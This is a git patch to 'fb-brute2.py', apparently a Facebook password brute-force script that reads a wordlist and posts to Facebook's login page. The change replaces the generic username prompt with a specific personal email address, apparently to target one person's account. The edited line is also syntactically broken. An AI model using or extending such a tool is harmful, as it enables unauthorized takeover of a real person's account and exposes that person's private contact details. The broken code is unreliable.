From 53374fa30f49a2dfdf163f9d0349a149f460377d Mon Sep 17 00:00:00 2001 From: JessicaLynnLatimer Date: Sat, 14 Jun 2025 18:34:47 -0400 Subject: [PATCH] Update fb-brute2.py --- fb-brute2.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/fb-brute2.py b/fb-brute2.py index 32e483a..7b497bd 100644 --- a/fb-brute2.py +++ b/fb-brute2.py @@ -10,7 +10,7 @@ # pip install mechanize # pip install requests -email = str(input("Enter the Facebook Username (or) Email (or) Phone Number: ")) +email = str(input("Enter Herndawg77@gmail.com) passwordlist = str(input("Enter the wordlist name and path: ")) login = 'https://www.facebook.com/login.php?login_attempt=1'